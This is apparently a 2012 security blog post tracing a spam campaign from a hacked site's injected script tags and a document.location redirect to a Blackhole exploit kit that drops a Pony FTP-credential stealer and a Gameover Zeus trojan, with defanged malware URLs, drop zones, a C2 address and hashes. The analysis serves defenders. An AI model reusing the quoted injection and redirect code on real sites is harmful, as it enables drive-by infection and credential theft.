Better Business Bureau complaint

On Wednesday February 22, 2012 Spamalysis analyzed a ‘Better Business Bureau’-themed spam campaign.

The sample acquired by Spamalysis contained a link to orjinaldengebileklikleri[.]com/7NB5g8BK/index.html. The site orjinaldengebileklikleri[.]com appears to have been hacked and used by the spammers to host a page of javascript redirectors. In this case, the page at /7NB5g8BK/index.html contains the following code:

<script type=”text/javascript” src=”hxxp://fortvel[.]com[.]br/X45Gmh0N/js.js”></script>
<script type=”text/javascript” src=”hxxp://bemestarestanplaza[.]com[.]br/sV7wfiZK/js.js”></script>
<script type=”text/javascript” src=”hxxp://lntecnoinfo[.]com[.]br/b6MtNdEX/js.js”></script>
<script type=”text/javascript” src=”hxxp://sdpatrimonial[.]com[.]br/8S6GpzBx/js.js”></script>
<script type=”text/javascript” src=”hxxp://sunjewel[.]com[.]ph/jwpceYRf/js.js”></script>
<script type=”text/javascript” src=”hxxp://www[.]jamieparker[.]org[.]au/qrMGma21/js.js”></script>

As of now these javascript redirectors currently contain the following document.location script:

document.location=’hxxp://favoriteburger[.]net/search.php?page=73a07bcb51f4be71′;

This document.location script will send innocent victims to a Blackhole Exploit kit host at favoriteburger[.]net. Blackhole Exploit kits are identifiable by the ‘search.php?page=’ string in the URI path. This exploit kit probes victim browsers for a series of vulnerabilities. If a vulnerability is found the kit drops a malicious payload.

The particular kit at favoriteburger[.]net dropped a payload from favoriteburger[.]net/d.php?f=9e50a&e=4. This payload had the following properties:

File: calc.exe
Size: 94720
MD5: 60d889e7eaada6949e97bf94B3dd01ed

Its also worth noting that Conrad at Dynamo’s Blog has found American Institue of CPAs-themed spam that also redirects victims through the same Blackhole exploit kit at favoriteburger[.]net/search.php?page=73a07bcb51f4be71.

Note that Wepawet also analyzed this same kit on 2011-02-21. During its analysis Wepewat picked up a different payload from the same location favoriteburger[.]net/d.php?f=9e50a&e=1. The payload retrieved by Wepewat had an MD5 of d41d8cd98f00b204e9800998ecf8427e. Though the hashes are different the payloads are likely the same as the bad guys running this exploit kit are almost certainly repacking or recompiling their malware in an effort to defeat AV engines.

The current binary with the hash 60d889e7eaada6949e97bf94B3dd01ed was not detected by any AV vendors as malicious on VirusTotal when it was first submitted on 2012-02-21.

This binary is a ‘Pony’ downloader variant. It scans the victim’s computer for FTP credentials. Stolen credentials are then sent back to a drop zone at favoriteburger[.]net/pony/gate.php. Note that the same favoriteburger[.]net used to host the Blackhole Exploit kit also hosts the drop zone for the Pony downloader. This Pony variant was also configured to POST stolen credentials to the following backup drop zones should the primary drop at favoriteburger[.]net be unavailable:

hxxp://favoriteguild[.]com/pony/gate.php
hxxp://favoriteleague[.]com/pony/gate.php
hxxp://favoritelot[.]com/pony/gate.php
hxxp://favoritetank[.]net/pony/gate.php
hxxp://linertweet[.]com/pony/gate.php

If I were a betting man, Id wager that the above domains also hosted Blackhole Exploit kits pushing out the same family of Pony downloaders.

The Pony downloader then retrieves secondary payloads from the following locations:

hxxp://www[.]diamande[.]ee/nrD19nS.exe
hxxp://crossdressinglover[.]co[.]uk/0wK76.exe
hxxp://myvidawell.h1864257[.]stratoserver[.]net/md5vRBNi.exe

These payloads are identical – each has the following properties:

Size: 291328
MD5: 19c31de2a4fba6d7379c944b9cf23f18

This payload is a Gameover Zeus banking trojan. It is currently detected by only 6 of 43 AV vendors on VirusTotal.

This Gameover Zeus variant has a botid of “mmx22” and also searches victim machines for data. Stolen data is sent to a drop zone at 68.173.14.233 over port 10177.

Advertisements

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s

%d bloggers like this: